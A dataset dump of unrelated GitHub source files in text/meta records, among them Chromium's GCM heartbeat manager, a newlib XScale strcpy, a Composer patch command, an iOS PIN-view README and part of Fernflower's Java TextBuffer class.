text
stringlengths 2
99.5k
| meta
dict |
|---|---|
# AUTOGENERATED FILE
AT_FDCWD = 18446744073709551516
KDDISABIO = 536890173
KDENABIO = 536890172
KDGETLED = 1074023233
KDGKBMODE = 1074023174
KDMKTONE = 536890120
KDSETLED = 536890178
KDSETMODE = 536890122
KDSETRAD = 536890179
KD_GRAPHICS = 1
KD_TEXT = 0
K_RAW = 0
K_XLATE = 1
LED_CAP = 1
LED_NUM = 2
LED_SCR = 4
SYS_ioctl = 54
SYS_openat = 321
VT_ACKACQ = 2
VT_ACTIVATE = 536901125
VT_AUTO = 0
VT_FALSE = 0
VT_GETACTIVE = 1074034183
VT_GETMODE = 1074296323
VT_GETSTATE = 1074165348
VT_OPENQRY = 1074034177
VT_PROCESS = 1
VT_RELDISP = 536901124
VT_SETMODE = 2148038146
VT_TRUE = 1
VT_WAITACTIVE = 536901126
WSDISPLAYIO_ADDSCREEN = 2149865299
WSDISPLAYIO_DELFONT = 2153273167
WSDISPLAYIO_DELSCREEN = 2148030292
WSDISPLAYIO_GBURNER = 1074550610
WSDISPLAYIO_GETEMULTYPE = 3222558558
WSDISPLAYIO_GETSCREEN = 3223607125
WSDISPLAYIO_GETSCREENTYPE = 3223869277
WSDISPLAYIO_GMODE = 1074026315
WSDISPLAYIO_GVIDEO = 1074026308
WSDISPLAYIO_LDFONT = 2153273165
WSDISPLAYIO_LSFONT = 3227014990
WSDISPLAYIO_MODE_DUMBFB = 2
WSDISPLAYIO_MODE_EMUL = 0
WSDISPLAYIO_MODE_MAPPED = 1
WSDISPLAYIO_SBURNER = 2148292433
WSDISPLAYIO_SETSCREEN = 2147768150
WSDISPLAYIO_SMODE = 2147768140
WSDISPLAYIO_SVIDEO = 2147768133
WSDISPLAYIO_USEFONT = 2153273168
WSDISPLAYIO_VIDEO_OFF = 0
WSDISPLAYIO_VIDEO_ON = 1
WSDISPLAYIO_WSMOUSED = 2149078872
WSDISPLAY_BURN_KBD = 2
WSDISPLAY_BURN_MOUSE = 4
WSDISPLAY_BURN_OUTPUT = 8
WSDISPLAY_BURN_VBLANK = 1
WSDISPLAY_DELSCR_FORCE = 1
WSDISPLAY_DELSCR_QUIET = 2
WSDISPLAY_FONTENC_IBM = 1
WSDISPLAY_FONTENC_ISO = 0
WSDISPLAY_FONTORDER_KNOWN = 0
WSDISPLAY_FONTORDER_L2R = 1
WSDISPLAY_FONTORDER_R2L = 2
WSEMUL_NAME_SIZE = 16
WSFONT_NAME_SIZE = 32
WSKBDIO_BELL = 536893185
WSKBDIO_COMPLEXBELL = 2148554498
WSKBDIO_GETBACKLIGHT = 1074550545
WSKBDIO_GETBELL = 1074812676
WSKBDIO_GETDEFAULTBELL = 1074812678
WSKBDIO_GETDEFAULTKEYREPEAT = 1074550538
WSKBDIO_GETENCODING = 1074026255
WSKBDIO_GETENCODINGS = 3222296341
WSKBDIO_GETKEYREPEAT = 1074550536
WSKBDIO_GETMAP = 3222296333
WSKBDIO_GETMODE = 1074026260
WSKBDIO_SETBACKLIGHT = 2148292370
WSKBDIO_SETBELL = 2148554499
WSKBDIO_SETDEFAULTBELL = 2148554501
WSKBDIO_SETDEFAULTKEYREPEAT = 2148292361
WSKBDIO_SETENCODING = 2147768080
WSKBDIO_SETKEYREPEAT = 2148292359
WSKBDIO_SETMAP = 2148554510
WSKBDIO_SETMODE = 2147768083
WSKBD_RAW = 1
WSMOUSECFG_BOTTOM_EDGE = 131
WSMOUSECFG_CENTERWIDTH = 132
WSMOUSECFG_DECELERATION = 36
WSMOUSECFG_DISABLE = 71
WSMOUSECFG_DX_MAX = 32
WSMOUSECFG_DX_SCALE = 0
WSMOUSECFG_DY_MAX = 33
WSMOUSECFG_DY_SCALE = 1
WSMOUSECFG_EDGESCROLL = 68
WSMOUSECFG_F2PRESSURE = 136
WSMOUSECFG_F2WIDTH = 135
WSMOUSECFG_HORIZSCROLL = 69
WSMOUSECFG_HORIZSCROLLDIST = 133
WSMOUSECFG_LEFT_EDGE = 128
WSMOUSECFG_LOG_EVENTS = 257
WSMOUSECFG_LOG_INPUT = 256
WSMOUSECFG_PRESSURE_HI = 3
WSMOUSECFG_PRESSURE_LO = 2
WSMOUSECFG_RIGHT_EDGE = 129
WSMOUSECFG_SMOOTHING = 38
WSMOUSECFG_SOFTBUTTONS = 64
WSMOUSECFG_SOFTMBTN = 65
WSMOUSECFG_STRONG_HYSTERESIS = 37
WSMOUSECFG_SWAPSIDES = 70
WSMOUSECFG_SWAPXY = 5
WSMOUSECFG_TAPPING = 72
WSMOUSECFG_TAP_CLICKTIME = 138
WSMOUSECFG_TAP_LOCKTIME = 139
WSMOUSECFG_TAP_MAXTIME = 137
WSMOUSECFG_TOPBUTTONS = 66
WSMOUSECFG_TOP_EDGE = 130
WSMOUSECFG_TRKMAXDIST = 4
WSMOUSECFG_TWOFINGERSCROLL = 67
WSMOUSECFG_VERTSCROLLDIST = 134
WSMOUSECFG_X_HYSTERESIS = 34
WSMOUSECFG_X_INV = 6
WSMOUSECFG_Y_HYSTERESIS = 35
WSMOUSECFG_Y_INV = 7
WSMOUSEIO_GCALIBCOORDS = 1092638501
WSMOUSEIO_GETPARAMS = 2148554535
WSMOUSEIO_GTYPE = 1074026272
WSMOUSEIO_SCALIBCOORDS = 2166380324
WSMOUSEIO_SETMODE = 2147768102
WSMOUSEIO_SETPARAMS = 2148554536
WSMOUSEIO_SRES = 2147768097
WSMOUSE_CALIBCOORDS_MAX = 16
WSMOUSE_COMPAT = 0
WSMOUSE_NATIVE = 1
WSMUXIO_ADD_DEVICE = 2148030305
WSMUXIO_INJECTEVENT = 2149078880
WSMUXIO_LIST_DEVICES = 3238287203
WSMUXIO_REMOVE_DEVICE = 2148030306
WSMUX_KBD = 2
WSMUX_MAXDEV = 32
WSMUX_MOUSE = 1
WSMUX_MUX = 3
WSSCREEN_NAME_SIZE = 16
|
{
"pile_set_name": "Github"
}
|
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "google_apis/gcm/engine/heartbeat_manager.h"
#include <utility>
#include "base/callback.h"
#include "base/location.h"
#include "base/metrics/histogram_macros.h"
#include "base/power_monitor/power_monitor.h"
#include "base/threading/thread_task_runner_handle.h"
#include "base/time/time.h"
#include "base/timer/timer.h"
#include "build/build_config.h"
#include "google_apis/gcm/protocol/mcs.pb.h"
#include "net/base/network_change_notifier.h"
namespace gcm {
namespace {
// Default and limit values for heartbeat scheduling. All intervals are in
// milliseconds and chosen to balance connection liveness against battery use.
// The default heartbeat when on a mobile or unknown network.
const int kCellHeartbeatDefaultMs = 1000 * 60 * 28; // 28 minutes.
// The default heartbeat when on WiFi (also used for ethernet).
const int kWifiHeartbeatDefaultMs = 1000 * 60 * 15; // 15 minutes.
// The default heartbeat ack interval.
const int kHeartbeatAckDefaultMs = 1000 * 60 * 1; // 1 minute.
// Minimum allowed client default heartbeat interval.
const int kMinClientHeartbeatIntervalMs = 1000 * 30; // 30 seconds.
// Minimum time spent sleeping before we force a new heartbeat.
const int kMinSuspendTimeMs = 1000 * 10; // 10 seconds.
#if defined(OS_LINUX) && !defined(OS_CHROMEOS)
// The period at which to check if the heartbeat time has passed. Used to
// protect against platforms where the timer is delayed by the system being
// suspended. Only needed on linux because the other OSes provide a standard
// way to be notified of system suspend and resume events.
const int kHeartbeatMissedCheckMs = 1000 * 60 * 5; // 5 minutes.
#endif // defined(OS_LINUX) && !defined(OS_CHROMEOS)
} // namespace
// Constructs an idle manager; nothing is scheduled until Start() is called.
HeartbeatManager::HeartbeatManager()
: waiting_for_ack_(false),
heartbeat_interval_ms_(0),
server_interval_ms_(0),
client_interval_ms_(0),
// retain_user_task is required so the pending task can be transplanted into
// a replacement timer in UpdateHeartbeatTimer(). The timer is one-shot and
// re-armed manually by RestartTimer().
heartbeat_timer_(new base::Timer(true /* retain_user_task */,
false /* is_repeating */)),
weak_ptr_factory_(this) {
}
HeartbeatManager::~HeartbeatManager() {
  // Stop listening for system suspend and resume events. The monitor can be
  // absent (e.g. in tests), hence the declaration-in-condition null check.
  if (base::PowerMonitor* power_monitor = base::PowerMonitor::Get())
    power_monitor->RemoveObserver(this);
}
// Begins heartbeating: registers for power events, computes the interval and
// arms the timer. |send_heartbeat_callback| is invoked whenever a heartbeat
// should be sent; |trigger_reconnect_callback| when the connection is deemed
// lost. Both must be non-null.
void HeartbeatManager::Start(
const base::Closure& send_heartbeat_callback,
const ReconnectCallback& trigger_reconnect_callback) {
DCHECK(!send_heartbeat_callback.is_null());
DCHECK(!trigger_reconnect_callback.is_null());
send_heartbeat_callback_ = send_heartbeat_callback;
trigger_reconnect_callback_ = trigger_reconnect_callback;
// Listen for system suspend and resume events.
base::PowerMonitor* monitor = base::PowerMonitor::Get();
if (monitor)
monitor->AddObserver(this);
// Calculate the heartbeat interval just before we start the timer.
UpdateHeartbeatInterval();
// Kicks off the timer.
waiting_for_ack_ = false;
RestartTimer();
}
void HeartbeatManager::Stop() {
heartbeat_expected_time_ = base::Time();
heartbeat_interval_ms_ = 0;
heartbeat_timer_->Stop();
waiting_for_ack_ = false;
base::PowerMonitor* monitor = base::PowerMonitor::Get();
if (monitor)
monitor->RemoveObserver(this);
}
// Called when the server acknowledges a heartbeat: leaves ack-wait mode and
// schedules the next full-interval heartbeat.
void HeartbeatManager::OnHeartbeatAcked() {
// An ack arriving after Stop() (timer no longer running) is stale; ignore it.
if (!heartbeat_timer_->IsRunning())
return;
DCHECK(!send_heartbeat_callback_.is_null());
DCHECK(!trigger_reconnect_callback_.is_null());
waiting_for_ack_ = false;
RestartTimer();
}
// Adopts a server-provided heartbeat interval. Invalid configs (uninitialized
// proto, missing or non-positive interval) are ignored.
void HeartbeatManager::UpdateHeartbeatConfig(
    const mcs_proto::HeartbeatConfig& config) {
  const bool config_is_usable = config.IsInitialized() &&
                                config.has_interval_ms() &&
                                config.interval_ms() > 0;
  if (!config_is_usable)
    return;
  DVLOG(1) << "Updating server heartbeat interval to " << config.interval_ms();
  server_interval_ms_ = config.interval_ms();
  // Recompute the effective heartbeat interval now that a server value is
  // available.
  UpdateHeartbeatInterval();
}
// Returns when the next heartbeat (or ack timeout) will fire, or a null
// TimeTicks when no heartbeat is currently scheduled.
base::TimeTicks HeartbeatManager::GetNextHeartbeatTime() const {
  if (!heartbeat_timer_->IsRunning())
    return base::TimeTicks();
  return heartbeat_timer_->desired_run_time();
}
// Swaps in a replacement timer implementation, preserving any in-flight delay
// and pending task. Statement order matters: state must be captured from the
// old timer before it is stopped and replaced.
void HeartbeatManager::UpdateHeartbeatTimer(
std::unique_ptr<base::Timer> timer) {
bool was_running = heartbeat_timer_->IsRunning();
// NOTE(review): desired_run_time() is sampled even when the timer is not
// running; the result is only consumed below when |was_running| is true.
base::TimeDelta remaining_delay =
heartbeat_timer_->desired_run_time() - base::TimeTicks::Now();
// user_task() is available because the timer was constructed with
// retain_user_task == true.
base::Closure timer_task(heartbeat_timer_->user_task());
heartbeat_timer_->Stop();
heartbeat_timer_ = std::move(timer);
if (was_running)
heartbeat_timer_->Start(FROM_HERE, remaining_delay, timer_task);
}
void HeartbeatManager::OnSuspend() {
// The system is going to sleep. Record the time, so on resume we know how
// much time the machine was suspended.
suspend_time_ = base::Time::Now();
}
void HeartbeatManager::OnResume() {
// The system just resumed from sleep. It's likely that the connection to
// MCS was silently lost during that time, even if a heartbeat is not yet
// due. Force a heartbeat to detect if the connection is still good.
base::TimeDelta elapsed = base::Time::Now() - suspend_time_;
UMA_HISTOGRAM_LONG_TIMES("GCM.SuspendTime", elapsed);
// Make sure a minimum amount of time has passed before forcing a heartbeat to
// avoid any tight loop scenarios.
// If the |send_heartbeat_callback_| is null, it means the heartbeat manager
// hasn't been started, so do nothing.
if (elapsed > base::TimeDelta::FromMilliseconds(kMinSuspendTimeMs) &&
!send_heartbeat_callback_.is_null())
OnHeartbeatTriggered();
}
// Timer callback. If the previous heartbeat was never acked, treats the
// connection as dead and reconnects; otherwise sends a new heartbeat and arms
// the (shorter) ack timeout.
void HeartbeatManager::OnHeartbeatTriggered() {
// Reset the weak pointers used for heartbeat checks.
weak_ptr_factory_.InvalidateWeakPtrs();
if (waiting_for_ack_) {
LOG(WARNING) << "Lost connection to MCS, reconnecting.";
ResetConnection(ConnectionFactory::HEARTBEAT_FAILURE);
return;
}
waiting_for_ack_ = true;
// Arm the ack timeout before running the callback, in case the callback
// itself triggers reentrant state changes.
RestartTimer();
send_heartbeat_callback_.Run();
}
// (Re)arms the one-shot timer: either the full heartbeat interval, or the
// much shorter ack window when a heartbeat has just been sent.
void HeartbeatManager::RestartTimer() {
int interval_ms = heartbeat_interval_ms_;
if (waiting_for_ack_) {
interval_ms = kHeartbeatAckDefaultMs;
DVLOG(1) << "Resetting timer for ack within " << interval_ms << " ms.";
} else {
DVLOG(1) << "Sending next heartbeat in " << interval_ms << " ms.";
}
// Record the wall-clock deadline so CheckForMissedHeartbeat() can detect a
// timer that was delayed past its due time (e.g. by system suspend).
heartbeat_expected_time_ =
base::Time::Now() + base::TimeDelta::FromMilliseconds(interval_ms);
heartbeat_timer_->Start(FROM_HERE,
base::TimeDelta::FromMilliseconds(interval_ms),
base::Bind(&HeartbeatManager::OnHeartbeatTriggered,
weak_ptr_factory_.GetWeakPtr()));
#if defined(OS_LINUX) && !defined(OS_CHROMEOS)
// Windows, Mac, Android, iOS, and Chrome OS all provide a way to be notified
// when the system is suspending or resuming. The only one that does not is
// Linux so we need to poll to check for missed heartbeats.
base::ThreadTaskRunnerHandle::Get()->PostDelayedTask(
FROM_HERE,
base::Bind(&HeartbeatManager::CheckForMissedHeartbeat,
weak_ptr_factory_.GetWeakPtr()),
base::TimeDelta::FromMilliseconds(kHeartbeatMissedCheckMs));
#endif // defined(OS_LINUX) && !defined(OS_CHROMEOS)
}
// Polling fallback (Linux only): manually fires the heartbeat if the timer
// slept past its wall-clock deadline, otherwise reschedules itself.
void HeartbeatManager::CheckForMissedHeartbeat() {
// If there's no heartbeat pending, return without doing anything.
if (heartbeat_expected_time_.is_null())
return;
// If the heartbeat has been missed, manually trigger it.
if (base::Time::Now() > heartbeat_expected_time_) {
UMA_HISTOGRAM_LONG_TIMES("GCM.HeartbeatMissedDelta",
base::Time::Now() - heartbeat_expected_time_);
OnHeartbeatTriggered();
return;
}
#if defined(OS_LINUX) && !defined(OS_CHROMEOS)
// Otherwise check again later.
base::ThreadTaskRunnerHandle::Get()->PostDelayedTask(
FROM_HERE,
base::Bind(&HeartbeatManager::CheckForMissedHeartbeat,
weak_ptr_factory_.GetWeakPtr()),
base::TimeDelta::FromMilliseconds(kHeartbeatMissedCheckMs));
#endif // defined(OS_LINUX) && !defined(OS_CHROMEOS)
}
// Recomputes |heartbeat_interval_ms_| with precedence: server value, then a
// shorter client value, then the network-type default.
void HeartbeatManager::UpdateHeartbeatInterval() {
// Server interval takes precedence over client interval, even if the latter
// is less.
if (server_interval_ms_ != 0) {
// If a server interval is set, it overrides any local one.
heartbeat_interval_ms_ = server_interval_ms_;
} else if (HasClientHeartbeatInterval() &&
(client_interval_ms_ < heartbeat_interval_ms_ ||
heartbeat_interval_ms_ == 0)) {
// Client interval might have been adjusted up, which should only take
// effect during a reconnection.
heartbeat_interval_ms_ = client_interval_ms_;
} else if (heartbeat_interval_ms_ == 0) {
// If interval is still 0, recalculate it based on network type.
heartbeat_interval_ms_ = GetDefaultHeartbeatInterval();
}
DCHECK_GT(heartbeat_interval_ms_, 0);
}
int HeartbeatManager::GetDefaultHeartbeatInterval() {
// For unknown connections, use the longer cellular heartbeat interval.
int heartbeat_interval_ms = kCellHeartbeatDefaultMs;
if (net::NetworkChangeNotifier::GetConnectionType() ==
net::NetworkChangeNotifier::CONNECTION_WIFI ||
net::NetworkChangeNotifier::GetConnectionType() ==
net::NetworkChangeNotifier::CONNECTION_ETHERNET) {
heartbeat_interval_ms = kWifiHeartbeatDefaultMs;
}
return heartbeat_interval_ms;
}
// The maximum a client may request is the network-type default interval.
int HeartbeatManager::GetMaxClientHeartbeatIntervalMs() {
return GetDefaultHeartbeatInterval();
}
int HeartbeatManager::GetMinClientHeartbeatIntervalMs() {
// Returning a constant. This should be adjusted for connection type, like the
// default/max interval.
return kMinClientHeartbeatIntervalMs;
}
// Stores a client-requested interval. 0 clears the client override; any other
// out-of-range value, or a no-op change, is ignored. Resets the connection
// immediately only when the new interval shortens the current one.
void HeartbeatManager::SetClientHeartbeatIntervalMs(int interval_ms) {
if ((interval_ms != 0 && !IsValidClientHeartbeatInterval(interval_ms)) ||
interval_ms == client_interval_ms_) {
return;
}
client_interval_ms_ = interval_ms;
// Only reset connection if the new heartbeat interval is shorter. If it is
// longer, the connection will reset itself at some point and interval will be
// fixed.
if (client_interval_ms_ > 0 && client_interval_ms_ < heartbeat_interval_ms_) {
ResetConnection(ConnectionFactory::NEW_HEARTBEAT_INTERVAL);
}
}
// Returns the client-requested interval, or 0 when none has been set.
int HeartbeatManager::GetClientHeartbeatIntervalMs() {
return client_interval_ms_;
}
// True when a non-zero client override interval has been set.
bool HeartbeatManager::HasClientHeartbeatInterval() {
return client_interval_ms_ != 0;
}
// A client interval is valid iff it lies within
// [kMinClientHeartbeatIntervalMs, network-type default], inclusive.
bool HeartbeatManager::IsValidClientHeartbeatInterval(int interval) {
  const int upper_bound_ms = GetDefaultHeartbeatInterval();
  return interval >= kMinClientHeartbeatIntervalMs &&
         interval <= upper_bound_ms;
}
// Tears down heartbeat state and asks the owner to reconnect for |reason|.
// Stop() must run first so no stale heartbeat fires during reconnection.
void HeartbeatManager::ResetConnection(
ConnectionFactory::ConnectionResetReason reason) {
Stop();
trigger_reconnect_callback_.Run(reason);
}
} // namespace gcm
|
{
"pile_set_name": "Github"
}
|
// Copyright © 2019 Banzai Cloud
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package monitoring
// outputPrometheus produces the integrated-service output entries for the
// Prometheus component, reusing the shared baseOutput fields and behavior.
type outputPrometheus struct {
baseOutput
}
// newPrometheusOutputHelper builds an outputPrometheus from the service
// spec's Prometheus settings and the cluster's kubeconfig bytes.
func newPrometheusOutputHelper(
kubeConfig []byte,
spec integratedServiceSpec,
) outputPrometheus {
return outputPrometheus{
baseOutput: baseOutput{
ingress: spec.Prometheus.Ingress.baseIngressSpec,
secretID: spec.Prometheus.Ingress.SecretID,
enabled: spec.Prometheus.Enabled,
k8sConfig: kubeConfig,
},
}
}
// getOutputType returns the human-readable component name used in output keys.
func (outputPrometheus) getOutputType() string {
return "Prometheus"
}
// getTopLevelDeploymentKey returns the top-level Helm values key for this
// component.
func (outputPrometheus) getTopLevelDeploymentKey() string {
return "prometheus"
}
// getDeploymentValueParentKey returns the nested Helm values key under which
// the component's deployment values live.
func (outputPrometheus) getDeploymentValueParentKey() string {
return "prometheusSpec"
}
// getGeneratedSecretName returns the per-cluster secret name generated for
// Prometheus credentials.
func (outputPrometheus) getGeneratedSecretName(clusterID uint) string {
return getPrometheusSecretName(clusterID)
}
// getServiceName returns the in-cluster service name for Prometheus.
// NOTE(review): "operato" looks truncated, but presumably matches the
// Helm-generated (length-truncated) service name — confirm against the chart
// before "fixing" the spelling.
func (outputPrometheus) getServiceName() string {
return "monitor-prometheus-operato-prometheus"
}
|
{
"pile_set_name": "Github"
}
|
<?php
/**
* Copyright © Vaimo Group. All rights reserved.
* See LICENSE_VAIMO.txt for license details.
*/
namespace Vaimo\ComposerPatches\Composer\Commands;
/**
 * Composer command "patch:apply": applies patches for selected package(s).
 * Inherits all behavior from PatchCommand, minus the redo/undo options.
 */
class ApplyCommand extends \Vaimo\ComposerPatches\Composer\Commands\PatchCommand
{
    protected function configure()
    {
        parent::configure();
        $this->setName('patch:apply');
        $this->setDescription('Apply a patch or patches for certain package(s)');
        // The apply command does not support the redo/undo flags declared by
        // the base patch command, so strip them from the input definition.
        $definition = $this->getDefinition();
        $availableOptions = $definition->getOptions();
        unset($availableOptions['redo']);
        unset($availableOptions['undo']);
        $definition->setOptions($availableOptions);
    }
}
|
{
"pile_set_name": "Github"
}
|
- [name , hr, avg ]
- [Mark McGwire, 65, 0.278]
- [Sammy Sosa , 63, 0.288]
|
{
"pile_set_name": "Github"
}
|
5f04c27cc6ee8625fe2405fb0f7da9a3
|
{
"pile_set_name": "Github"
}
|
<keyframes />
|
{
"pile_set_name": "Github"
}
|
# SVPinView
SVPinView is a light-weight customisable library used for accepting pin numbers or one-time passwords.
<p align="left">
<a href="https://developer.apple.com/swift"><img src="https://img.shields.io/badge/Swift_4-compatible-4BC51D.svg?style=flat" alt="Swift 4 compatible" /></a>
<a href="https://cocoapods.org/pods/SVPinView"><img src="https://img.shields.io/badge/pod-2.1.0-blue.svg" alt="CocoaPods compatible" /></a>
<img src="https://img.shields.io/badge/platform-iOS-blue.svg?style=flat" alt="Platform iOS" />
<a href="https://raw.githubusercontent.com/maxsokolov/tablekit/master/LICENSE"><img src="http://img.shields.io/badge/license-MIT-blue.svg?style=flat" alt="License: MIT" /></a>
</p>

## Getting Started
An [example ViewController](https://github.com/xornorik/SVPinView/blob/master/SVPinView/Example/PinViewController.swift) is included for demonstrating the functionality of SVPinView.
## Installation
### CocoaPods
Add the following line to your Podfile:
```ruby
pod 'SVPinView'
```
Then run the following in the same directory as your Podfile:
```ruby
pod install
```
### Manual
Clone the repo and drag files from `SVPinView/Source` folder into your Xcode project.
## Usage
### Storyboard

### Code
```swift
pinView.pinLength = 5
pinView.secureCharacter = "\u{25CF}"
pinView.interSpace = 5
pinView.textColor = UIColor.black
pinView.underlineColor = UIColor.black
pinView.underLineThickness = 2
pinView.shouldSecureText = true
pinView.font = UIFont.systemFont(ofSize: 15)
pinView.keyboardType = .phonePad
pinView.pinIinputAccessoryView = UIView()
```
### Callbacks
SVPinView has a `didFinishCallback` closure, which is executed after the pin has been entered. This is useful when a network call has to be made, or for navigating to a different ViewController, once the pin has been entered.
```swift
pinView.didFinishCallback = { pin in
print("The pin entered is \(pin)")
}
```
## Requirements
- iOS 9.0
- Xcode 8.0
## License
SVPinView is available under the MIT license. See LICENSE for details.
|
{
"pile_set_name": "Github"
}
|
attic
Everything else.
Collection of configs which:
may be obsolete
may be unsupported
may be useful for study
|
{
"pile_set_name": "Github"
}
|
#if defined __thumb__
/* Thumb mode cannot use the ARM-only inline assembly below; fall back to the
   generic C implementation. */
#include "../../string/strcpy.c"
#else
#include <string.h>
#include "xscale.h"
/* XScale-optimized strcpy: copies the NUL-terminated string |src| into
   |dest| and returns |dest|. Issues preload (PLD) hints on |src| and, when
   source and destination share alignment, copies word-at-a-time using the
   classic "detect a zero byte in a word" trick. */
char *
strcpy (char *dest, const char *src)
{
char *dest0 = dest;
asm (PRELOADSTR ("%0") : : "r" (src));
#ifndef __OPTIMIZE_SIZE__
/* Fast path only applies when src and dest have the same word misalignment;
   otherwise no amount of shifting makes word copies line up. */
if (((long)src & 3) == ((long)dest & 3))
{
/* Skip unaligned part. */
while ((long)src & 3)
{
/* Intentional assignment-in-condition: copy and test for NUL. */
if (! (*dest++ = *src++))
return dest0;
}
/* Load two constants:
R4 = 0xfefefeff [ == ~(0x80808080 << 1) ]
R5 = 0x80808080 */
/* Word loop: (word + 0xfefefeff) & ~word & 0x80808080 is non-zero iff
   any byte of the word is zero; exit to the byte loop on the word that
   contains the terminator. Clobbered registers are declared below. */
asm ("mov r5, #0x80\n\
ldr r1, [%1, #0]\n\
add r5, r5, #0x8000\n\
add r5, r5, r5, lsl #16\n\
mvn r4, r5, lsl #1\n\
\n\
add r3, r1, r5\n\
bic r3, r3, r1\n\
ands r2, r3, r4\n\
bne 1f\n\
0:\n\
ldr r3, [%1, #0]\n\
ldr r1, [%1, #4]!\n\
" PRELOADSTR("%1") "\n\
str r3, [%0], #4\n\
add r2, r1, r4\n\
bic r2, r2, r1\n\
ands r3, r2, r5\n\
beq 0b\n\
1:"
: "=&r" (dest), "=&r" (src)
: "0" (dest), "1" (src)
: "r1", "r2", "r3", "r4", "r5", "memory", "cc");
}
#endif
/* Byte-wise tail copy (also the whole copy when alignment differs or when
   compiled with -Os); copies up to and including the NUL terminator. */
while (*dest++ = *src++)
asm (PRELOADSTR ("%0") : : "r" (src));
return dest0;
}
#endif
|
{
"pile_set_name": "Github"
}
|
/*
* Copyright 2000-2015 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jetbrains.java.decompiler.main;
import org.jetbrains.java.decompiler.main.extern.IFernflowerPreferences;
import org.jetbrains.java.decompiler.util.StringUtil;
import java.util.*;
/**
* Allows to connect text with resulting lines
*
* @author egor
*/
public class TextBuffer
{
// Line separator configured for the decompiler session; all line/offset math
// in this class is based on it.
private final String myLineSeparator = DecompilerContext.getNewLineSeparator( );
// Indent unit appended by appendIndent(); taken from decompiler preferences.
private final String myIndent = (String) DecompilerContext.getProperty( IFernflowerPreferences.INDENT_STRING );
private final StringBuilder myStringBuilder;
// Maps a required output line number to a character offset in the buffer;
// null until checkMapCreated() lazily allocates it.
private Map<Integer, Integer> myLineToOffsetMapping = null;
public TextBuffer( )
{
myStringBuilder = new StringBuilder( );
}
// Creates a buffer with the given initial capacity.
public TextBuffer( int size )
{
myStringBuilder = new StringBuilder( size );
}
// Creates a buffer pre-filled with the given text.
public TextBuffer( String text )
{
myStringBuilder = new StringBuilder( text );
}
public TextBuffer append( String str )
{
myStringBuilder.append( str );
return this;
}
public TextBuffer append( char ch )
{
myStringBuilder.append( ch );
return this;
}
public TextBuffer append( int i )
{
myStringBuilder.append( i );
return this;
}
public TextBuffer appendLineSeparator( )
{
myStringBuilder.append( myLineSeparator );
return this;
}
// Appends the configured indent unit |length| times.
public TextBuffer appendIndent( int length )
{
while ( length-- > 0 )
{
append( myIndent );
}
return this;
}
public TextBuffer prepend( String s )
{
insert( 0, s );
return this;
}
// Wraps the current content between |left| and |right|.
public TextBuffer enclose( String left, String right )
{
prepend( left );
append( right );
return this;
}
// NOTE(review): only the space character is checked; tabs and line
// separators count as non-whitespace here — confirm that is intended.
public boolean containsOnlyWhitespaces( )
{
for ( int i = 0; i < myStringBuilder.length( ); i++ )
{
if ( myStringBuilder.charAt( i ) != ' ' )
{
return false;
}
}
return true;
}
// Renders the buffer. If a line-to-offset mapping exists, output lines are
// padded/compacted so each marked offset lands on its required line number.
// Otherwise, if only a line mapping exists, original line numbers are
// appended as trailing "//" comments. With neither, the raw text is returned.
@Override
public String toString( )
{
String original = myStringBuilder.toString( );
if ( myLineToOffsetMapping == null || myLineToOffsetMapping.isEmpty( ) )
{
if ( myLineMapping != null )
{
return addOriginalLineNumbers( );
}
return original;
}
else
{
StringBuilder res = new StringBuilder( );
String[] srcLines = original.split( myLineSeparator );
int currentLineStartOffset = 0;
int currentLine = 0;
int previousMarkLine = 0;
int dumpedLines = 0;
// Process marks in ascending line order so output lines are emitted once.
ArrayList<Integer> linesWithMarks = new ArrayList<Integer>( myLineToOffsetMapping.keySet( ) );
Collections.sort( linesWithMarks );
for ( Integer markLine : linesWithMarks )
{
Integer markOffset = myLineToOffsetMapping.get( markLine );
// Advance to the source line containing the marked offset, then dump
// the intervening lines stretched/compacted to reach |markLine|.
while ( currentLine < srcLines.length )
{
String line = srcLines[currentLine];
int lineEnd = currentLineStartOffset
+ line.length( )
+ myLineSeparator.length( );
if ( markOffset <= lineEnd )
{
int requiredLine = markLine - 1;
int linesToAdd = requiredLine - dumpedLines;
dumpedLines = requiredLine;
appendLines( res,
srcLines,
previousMarkLine,
currentLine,
linesToAdd );
previousMarkLine = currentLine;
break;
}
currentLineStartOffset = lineEnd;
currentLine++;
}
}
// Flush any source lines remaining after the last mark.
if ( previousMarkLine < srcLines.length )
{
appendLines( res,
srcLines,
previousMarkLine,
srcLines.length,
srcLines.length - previousMarkLine );
}
return res.toString( );
}
}
// Returns the buffer text with "// n [m ...]" original-line-number comments
// appended to each output line that has entries in myLineMapping.
private String addOriginalLineNumbers( )
{
StringBuilder sb = new StringBuilder( );
int lineStart = 0, lineEnd;
int count = 0, length = myLineSeparator.length( );
// NOTE(review): indexOf(...) > 0 skips a separator at offset 0 (an empty
// first line) — confirm that case cannot occur here.
while ( ( lineEnd = myStringBuilder.indexOf( myLineSeparator, lineStart ) ) > 0 )
{
++count;
sb.append( myStringBuilder.substring( lineStart, lineEnd ) );
Set<Integer> integers = myLineMapping.get( count );
if ( integers != null )
{
sb.append( "//" );
for ( Integer integer : integers )
{
sb.append( ' ' ).append( integer );
}
}
sb.append( myLineSeparator );
lineStart = lineEnd + length;
}
if ( lineStart < myStringBuilder.length( ) )
{
sb.append( myStringBuilder.substring( lineStart ) );
}
return sb.toString( );
}
// Emits srcLines[from..to) into |res| as exactly |requiredLineNumber| output
// lines: compacting (joining) lines when there are too many, or padding with
// empty lines when there are too few.
private void appendLines( StringBuilder res, String[] srcLines, int from,
int to, int requiredLineNumber )
{
if ( to - from > requiredLineNumber )
{
List<String> strings = compactLines( Arrays.asList( srcLines )
.subList( from, to ), requiredLineNumber );
int separatorsRequired = requiredLineNumber - 1;
for ( String s : strings )
